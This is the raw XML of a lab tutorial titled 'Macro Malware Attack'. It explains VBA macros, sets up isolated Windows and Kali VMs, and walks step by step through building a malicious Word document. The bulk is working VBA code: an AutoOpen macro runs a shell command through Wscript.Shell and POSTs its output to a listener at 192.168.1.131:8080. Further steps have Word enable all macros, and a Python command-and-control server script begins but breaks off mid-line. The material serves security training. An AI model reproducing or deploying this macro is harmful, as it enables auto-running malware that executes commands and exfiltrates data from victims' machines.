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7BD5" w14:textId="4B45EC9F" w:rsidR="0091276E" w:rsidRDefault="00503FDA" w:rsidP="00F87831">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="0091276E">
        <w:t>Macro Malware Attack</w:t>
      </w:r>
      <w:r w:rsidR="00F87831">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B0A300" w14:textId="093A9EBB" w:rsidR="00D37B6C" w:rsidRDefault="00D37B6C" w:rsidP="007D2AE7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">I. </w:t>
      </w:r>
      <w:r w:rsidR="00BA2EC9">
        <w:t>Understanding Macro and Macro Malware Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E833CB" w14:textId="420A4EE7" w:rsidR="00BA2EC9" w:rsidRDefault="00BA2EC9" w:rsidP="007D2AE7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>1. What is a Macro?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2081D374" w14:textId="188215B7" w:rsidR="00BA2EC9" w:rsidRDefault="00B116D9" w:rsidP="00B116D9">
      <w:pPr>
        <w:pStyle w:val="Pharagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      A macro is a script witten in VBA ( Visual Basic for Applications) that automates tasks in Microsoft Office applications such as Word and Excel. Macros can be used for legitimate automation but are often exploited by attacker to execute malicious code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A95E17" w14:textId="7A44AA3D" w:rsidR="00B116D9" w:rsidRDefault="00B116D9" w:rsidP="007D2AE7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>2. What is a Macro Malware Attack?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3743DEA5" w14:textId="70F5AEFB" w:rsidR="00B116D9" w:rsidRDefault="007D2AE7" w:rsidP="007D2AE7">
      <w:pPr>
        <w:pStyle w:val="Pharagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidR="00B116D9">
        <w:t>A Macro Malware Attack occurs when cybercriminals embed malicious VBA scripts in Office documents. When a user opens the docume</w:t>
      </w:r>
      <w:r>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidR="00B116D9">
        <w:t>t and enables macros, the script executes, potentially compromising the system by:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D1BEC1" w14:textId="10B35F8C" w:rsidR="00B116D9" w:rsidRDefault="00B116D9" w:rsidP="007D2AE7">
      <w:pPr>
        <w:pStyle w:val="Pharagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Downloading and executing additional payloads ( ransomware, keyloggers)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C6524F9" w14:textId="70EDC49C" w:rsidR="00B116D9" w:rsidRDefault="00B116D9" w:rsidP="007D2AE7">
      <w:pPr>
        <w:pStyle w:val="Pharagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Stealing sensitive information (credentials, network details).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9C7E3E" w14:textId="3009D70E" w:rsidR="00B116D9" w:rsidRDefault="00B116D9" w:rsidP="007D2AE7">
      <w:pPr>
        <w:pStyle w:val="Pharagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Communicating with a remote command-and-control (C2) Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048BF940" w14:textId="5FDB3144" w:rsidR="00B116D9" w:rsidRDefault="00B116D9" w:rsidP="00B116D9"/>
    <w:p w14:paraId="76FDD657" w14:textId="6D4E30B0" w:rsidR="00B116D9" w:rsidRDefault="00B116D9" w:rsidP="007D2AE7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">II. Setting Up a Lab </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BAED046" w14:textId="3C370483" w:rsidR="00B116D9" w:rsidRDefault="007D2AE7" w:rsidP="007D2AE7">
      <w:pPr>
        <w:pStyle w:val="Pharagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r w:rsidR="00B116D9">
        <w:t>To safely analyze macro malware, set up an isolated environment using Vmware Workstation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0D9290" w14:textId="71B758FB" w:rsidR="00B116D9" w:rsidRDefault="00B116D9" w:rsidP="007D2AE7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r w:rsidR="00784FD4">
        <w:t>Required Components</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21DD8547" w14:textId="4FC3F750" w:rsidR="00784FD4" w:rsidRDefault="00784FD4" w:rsidP="007D2AE7">
      <w:pPr>
        <w:pStyle w:val="Pharagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Windowns 10 VM ( Target for macro execution, Office installed)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF38E9B" w14:textId="462AA35D" w:rsidR="00784FD4" w:rsidRDefault="00784FD4" w:rsidP="007D2AE7">
      <w:pPr>
        <w:pStyle w:val="Pharagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Kali Linux VM ( For monitoring and intercepting network traffic)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CCA086A" w14:textId="04D7E2C4" w:rsidR="00784FD4" w:rsidRDefault="00784FD4" w:rsidP="007D2AE7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>2. Network Configuration (Host-only Mode)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69232C01" w14:textId="58C16DEA" w:rsidR="00784FD4" w:rsidRDefault="00784FD4" w:rsidP="007D2AE7">
      <w:pPr>
        <w:pStyle w:val="Pharagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Ensure that both VMs are in the host-only network to prevent external access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA27E9B" w14:textId="3F0CED6B" w:rsidR="00784FD4" w:rsidRDefault="00784FD4" w:rsidP="007D2AE7">
      <w:pPr>
        <w:pStyle w:val="Pharagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Assign static Ips:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DFCFDA8" w14:textId="3DB8A754" w:rsidR="00784FD4" w:rsidRDefault="00784FD4" w:rsidP="007D2AE7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Windows 10 : 192.168.1.133</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65DA979D" w14:textId="76DF02E0" w:rsidR="00784FD4" w:rsidRDefault="00784FD4" w:rsidP="007D2AE7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Kali Linux : 192.168.1.131</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D8257A" w14:textId="4581F07A" w:rsidR="00D37B6C" w:rsidRDefault="00784FD4" w:rsidP="007D2AE7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">III. Create a word Document with a Malicious Macro </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F34EB7" w14:textId="488F4D75" w:rsidR="00784FD4" w:rsidRDefault="00784FD4" w:rsidP="007D2AE7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Step 1 : Open VBA Editor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C9B648F" w14:textId="74FC4221" w:rsidR="00784FD4" w:rsidRDefault="00784FD4" w:rsidP="007D2AE7">
      <w:pPr>
        <w:pStyle w:val="Pharagraph"/>
      </w:pPr>
      <w:r>
        <w:t>1. Open Microsoft Word</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C81E646" w14:textId="1CBD9F03" w:rsidR="00784FD4" w:rsidRDefault="00784FD4" w:rsidP="007D2AE7">
      <w:pPr>
        <w:pStyle w:val="Pharagraph"/>
      </w:pPr>
      <w:r>
        <w:t>2. Press Alt + F11 to open the Microsoft Visual Basic for Application (VBA) Editor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3189F8C7" w14:textId="5BABFBEF" w:rsidR="00784FD4" w:rsidRDefault="00784FD4" w:rsidP="007D2AE7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Step 2: Insert a Module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FECD6E3" w14:textId="737AE8DA" w:rsidR="00784FD4" w:rsidRDefault="00784FD4" w:rsidP="007D2AE7">
      <w:pPr>
        <w:pStyle w:val="Pharagraph"/>
      </w:pPr>
      <w:r>
        <w:t>1. In the VBA Editor, locate the Project Explorer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D43E35D" w14:textId="1F8CEB46" w:rsidR="00784FD4" w:rsidRDefault="00784FD4" w:rsidP="007D2AE7">
      <w:pPr>
        <w:pStyle w:val="Pharagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. Find your document under Project </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2AAAE0" w14:textId="439F11C9" w:rsidR="00784FD4" w:rsidRDefault="00784FD4" w:rsidP="007D2AE7">
      <w:pPr>
        <w:pStyle w:val="Pharagraph"/>
      </w:pPr>
      <w:r>
        <w:t>3. Right-click on your document -&gt; Insert -&gt; Module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF05ABE" w14:textId="783502C5" w:rsidR="00D37B6C" w:rsidRDefault="00784FD4" w:rsidP="00784FD4">
      <w:pPr>
        <w:pStyle w:val="Pharagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="00B21BBA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="524B552A" wp14:editId="2F0F18E8">
            <wp:extent cx="4096322" cy="2276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322" cy="2276793"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B83B33" w14:textId="77777777" w:rsidR="003061B0" w:rsidRDefault="003061B0" w:rsidP="00784FD4">
      <w:pPr>
        <w:pStyle w:val="Pharagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E5F81BA" w14:textId="0221FE4A" w:rsidR="00784FD4" w:rsidRDefault="00784FD4" w:rsidP="007D2AE7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 3: Write the Malicious VBA Macro Code </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9064"/>
      </w:tblGrid>
      <w:tr w:rsidR="003061B0" w14:paraId="27FDC77C" w14:textId="77777777" w:rsidTr="003061B0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9064" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="72FEFFE7"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Function RunCommand(command As String) As String</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3BAC44F1"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On Error GoTo error</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5ADDAD7D"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Set objOL = CreateObject("Outlook.Application")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05556962"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Set WshShell = objOL.CreateObject("Wscript.Shell")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38B88754"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Set WshShellExec = WshShell.Exec(command)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A2C7A3C"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RunCommand = WshShellExec.Stdout.ReadAll</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="375A05AC"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Exit Function</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="139861F7"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error:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57F30956"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RunCommand = "ERROR"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="21BA0275"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End Function</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="77FD10A7" w14:textId="77777777" w:rsidR="003061B0" w:rsidRPr="00C66018" w:rsidRDefault="003061B0" w:rsidP="003061B0">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4274C1D1"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Function SendToServer(data As String)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="143C3F2D"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On Error GoTo error</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6650696D"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Dim objHTTP As Object</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35E970C3"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Dim URL As String</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5797AD79"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Set objHTTP = CreateObject("MSXML2.XMLHTTP")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70E6E37B" w14:textId="77777777" w:rsidR="003061B0" w:rsidRPr="00C66018" w:rsidRDefault="003061B0" w:rsidP="003061B0">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="64B1CE6E" w14:textId="5A68D094"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URL = "http://</w:t>
            </w:r>
            <w:r w:rsidRPr="003061B0">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>192.168.1.13</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidRPr="003061B0">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>:8080</w:t>
            </w:r>
            <w:r w:rsidRPr="00C66018">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>/"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14494FC5" w14:textId="77777777" w:rsidR="003061B0" w:rsidRPr="00C66018" w:rsidRDefault="003061B0" w:rsidP="003061B0">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5B85EB11"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objHTTP.Open "POST", URL, False</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B97D55A"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objHTTP.setRequestHeader "User-Agent", "Mozilla/4.0 (compatible; MSIE 6.0 Windows NT 5.0)"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4AE09FEE"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objHTTP.setRequestHeader "Content-Type", "application/x-www-form-urlencoded"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26645D2E"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objHTTP.Send "data=" &amp; data</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="735780E1"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Exit Function</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7EF82967"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error:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11594364"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MsgBox "Cannot connect to server"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="287B0741"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End Function</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="12D21DBC" w14:textId="77777777" w:rsidR="003061B0" w:rsidRPr="00C66018" w:rsidRDefault="003061B0" w:rsidP="003061B0">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="21CB75F6" w14:textId="598B8BC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Sub </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Auto</w:t>
            </w:r>
            <w:r w:rsidRPr="00C66018">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Open()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="15792ED8"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Dim strOutput As String</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6506CB17" w14:textId="0994C453"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strOutput = RunCommand("</w:t>
            </w:r>
            <w:r w:rsidR="00140D25">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>ipconfig</w:t>
            </w:r>
            <w:r w:rsidRPr="00C66018">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50AA1B27"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lastRenderedPageBreak/>
              <w:t xml:space="preserve">    MsgBox strOutput</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28E0934B"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 xml:space="preserve">    SendToServer strOutput</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A7F5BD8" w14:textId="77777777" w:rsidR="003061B0" w:rsidRPr="00C66018" w:rsidRDefault="003061B0" w:rsidP="003061B0">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C66018">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>End Sub</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46F7B594" w14:textId="77777777" w:rsidR="003061B0" w:rsidRDefault="003061B0" w:rsidP="00B21BBA"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6D250D95" w14:textId="77777777" w:rsidR="003061B0" w:rsidRDefault="003061B0" w:rsidP="00B21BBA"/>
    <w:p w14:paraId="1F78558A" w14:textId="2786B995" w:rsidR="0091276E" w:rsidRDefault="0091276E" w:rsidP="0091276E"/>
    <w:p w14:paraId="6227A8B4" w14:textId="77777777" w:rsidR="00BA6870" w:rsidRDefault="00B21BBA" w:rsidP="007D2AE7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step </w:t>
      </w:r>
      <w:r w:rsidR="00BA6870">
        <w:t>4. Save the Document as a Macro-Enable File</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="638A375A" w14:textId="77777777" w:rsidR="00BA6870" w:rsidRDefault="00BA6870" w:rsidP="007D2AE7">
      <w:pPr>
        <w:pStyle w:val="Pharagraph"/>
      </w:pPr>
      <w:r>
        <w:t>1. Press Ctrl+S to save the document</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="768A5E9E" w14:textId="229BB8C7" w:rsidR="00F87831" w:rsidRDefault="00BA6870" w:rsidP="007D2AE7">
      <w:pPr>
        <w:pStyle w:val="Pharagraph"/>
      </w:pPr>
      <w:r>
        <w:t>2. When prompted with a dialog box warning that macros cannot be saved in a standard document, click No</w:t>
      </w:r>
      <w:r w:rsidR="00B21BBA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1887BA" w14:textId="42E99ECA" w:rsidR="00B21BBA" w:rsidRDefault="00B21BBA" w:rsidP="007D2AE7">
      <w:pPr>
        <w:pStyle w:val="Pharagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5FA67897" wp14:editId="5888AF4D">
            <wp:extent cx="5441950" cy="13722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1950" cy="1372235"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="177D727E" w14:textId="4EDD3183" w:rsidR="007D2AE7" w:rsidRDefault="007D2AE7" w:rsidP="007D2AE7">
      <w:pPr>
        <w:pStyle w:val="Pharagraph"/>
      </w:pPr>
      <w:r>
        <w:t>3. Choose Save as Type: Word Macro-Enable Documnet (*.docm)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C16069" w14:textId="64FD03CF" w:rsidR="007D2AE7" w:rsidRDefault="007D2AE7" w:rsidP="007D2AE7">
      <w:pPr>
        <w:pStyle w:val="Pharagraph"/>
      </w:pPr>
      <w:r>
        <w:t>4. Click Save</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441E2B4A" w14:textId="77777777" w:rsidR="007D2AE7" w:rsidRDefault="00D37B6C" w:rsidP="007D2AE7">
      <w:pPr>
        <w:pStyle w:val="Pharagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="00D37B6C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B86B5A6" wp14:editId="2B9A2A9F">
            <wp:extent cx="5441950" cy="5235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789" cy="526435"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DBAE66A" w14:textId="77777777" w:rsidR="007D2AE7" w:rsidRDefault="007D2AE7" w:rsidP="007D2AE7">
      <w:pPr>
        <w:pStyle w:val="Pharagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A9197AF" w14:textId="4B25A1BE" w:rsidR="00D37B6C" w:rsidRPr="007D2AE7" w:rsidRDefault="007D2AE7" w:rsidP="007D2AE7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="007D2AE7">
        <w:t>Step 5. Enable Macros</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A60513" w14:textId="454C393A" w:rsidR="007D2AE7" w:rsidRDefault="007D2AE7" w:rsidP="007D2AE7">
      <w:pPr>
        <w:pStyle w:val="Pharagraph"/>
      </w:pPr>
      <w:r>
        <w:t>When opening the docm file, Word may block macros. To enable them:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="183C3A11" w14:textId="3716909B" w:rsidR="007D2AE7" w:rsidRDefault="007D2AE7" w:rsidP="007D2AE7">
      <w:pPr>
        <w:pStyle w:val="Pharagraph"/>
      </w:pPr>
      <w:r>
        <w:t>1. Open File -&gt; Options -&gt; Trust Center</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B652B0" w14:textId="68F2498C" w:rsidR="007D2AE7" w:rsidRDefault="007D2AE7" w:rsidP="007D2AE7">
      <w:pPr>
        <w:pStyle w:val="Pharagraph"/>
      </w:pPr>
      <w:r>
        <w:t>2. Click Trust Center Settings.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31FC617E" w14:textId="4A015106" w:rsidR="007D2AE7" w:rsidRDefault="007D2AE7" w:rsidP="007D2AE7">
      <w:pPr>
        <w:pStyle w:val="Pharagraph"/>
      </w:pPr>
      <w:r>
        <w:t>3. Under Macro Settings, select Enable all macros</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D805A75" w14:textId="5D7FAE3E" w:rsidR="00B21BBA" w:rsidRDefault="00B21BBA" w:rsidP="00B21BBA"/>
    <w:p w14:paraId="064C7617" w14:textId="7F902652" w:rsidR="008C43F6" w:rsidRDefault="008C43F6" w:rsidP="008C43F6">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>IV. Setting up a malicios Command &amp; Control Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6131673F" w14:textId="77777777" w:rsidR="008C43F6" w:rsidRDefault="008C43F6" w:rsidP="008C43F6">
      <w:pPr>
        <w:pStyle w:val="Pharagraph"/>
      </w:pPr>
      <w:r>
        <w:t>To capture the data sent by the macro, use a simple Python HTTP server on kali Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="634CF590" w14:textId="5BB3B8A7" w:rsidR="008C43F6" w:rsidRDefault="008C43F6" w:rsidP="008C43F6">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Step 1. Create the Python Server Script</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="432" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8632"/>
      </w:tblGrid>
      <w:tr w:rsidR="008C43F6" w14:paraId="26BBF98B" w14:textId="77777777" w:rsidTr="008C43F6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9064" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B72E276" w14:textId="77777777" w:rsidR="008C43F6" w:rsidRPr="008C43F6" w:rsidRDefault="008C43F6" w:rsidP="008C43F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008C43F6">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>import http.server</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51667CDE" w14:textId="77777777" w:rsidR="008C43F6" w:rsidRPr="008C43F6" w:rsidRDefault="008C43F6" w:rsidP="008C43F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008C43F6">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>import socketserver</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="63D12CBC" w14:textId="77777777" w:rsidR="008C43F6" w:rsidRPr="008C43F6" w:rsidRDefault="008C43F6" w:rsidP="008C43F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6AAE0B33" w14:textId="21C057B2" w:rsidR="008C43F6" w:rsidRPr="008C43F6" w:rsidRDefault="008C43F6" w:rsidP="008C43F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008C43F6">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>HOST = "192.168.1.1</w:t>
            </w:r>
